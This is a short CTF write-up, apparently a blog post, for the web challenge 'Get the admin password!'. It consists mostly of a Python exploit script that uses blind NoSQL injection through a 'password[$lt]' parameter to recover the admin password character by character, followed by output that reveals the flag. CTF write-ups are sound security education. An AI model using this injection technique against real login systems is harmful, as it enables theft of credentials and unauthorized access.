Get the admin password!
Web
Web
Problem
Get the admin password!
http://gap.chal.ctf.westerns.tokyo/
You can use test:test
Get the admin password!
http://gap.chal.ctf.westerns.tokyo/
You can use test:test
Flag
This Problem is very Simple NoSQL injection.
# exploit.py import urllib2 import urllib URL = "http://gap.chal.ctf.westerns.tokyo/login.php" result = "" for i in range(100): for j in range(0x20,0x90): data = {'user' : 'admin', 'password[$lt]' : result+chr(j)} data = urllib.urlencode(data) req = urllib2.Request(URL,data) res = urllib2.urlopen(req) if res.read().find("Wrong user name or password")>10: continue else: result += chr(j-1) print result break ''' shpik@shpik:/ctf/MMA/web/gap$ python exploit.py T TW TWC TWCT TWCTF TWCTF{ TWCTF{w TWCTF{wa TWCTF{was TWCTF{wass TWCTF{wassh TWCTF{wassho TWCTF{wasshoi TWCTF{wasshoi! TWCTF{wasshoi!s TWCTF{wasshoi!su TWCTF{wasshoi!sum TWCTF{wasshoi!summ TWCTF{wasshoi!summe TWCTF{wasshoi!summer TWCTF{wasshoi!summer_ TWCTF{wasshoi!summer_f TWCTF{wasshoi!summer_fe TWCTF{wasshoi!summer_fes TWCTF{wasshoi!summer_fest TWCTF{wasshoi!summer_festi TWCTF{wasshoi!summer_festiv TWCTF{wasshoi!summer_festiva TWCTF{wasshoi!summer_festival TWCTF{wasshoi!summer_festival! TWCTF{wasshoi!summer_festival!} '''
'0x400 CTF > 0x401 MMA 1st 2015' 카테고리의 다른 글
[Crypto] Twin Prime - 50pts (0) | 2016.09.05 |
---|---|
[Web] Global Page - 50pts (0) | 2016.09.05 |
[Web] Mortal Magi Agents - 300pts (0) | 2015.09.09 |
[Web] Login as admin! - 30pts (0) | 2015.09.08 |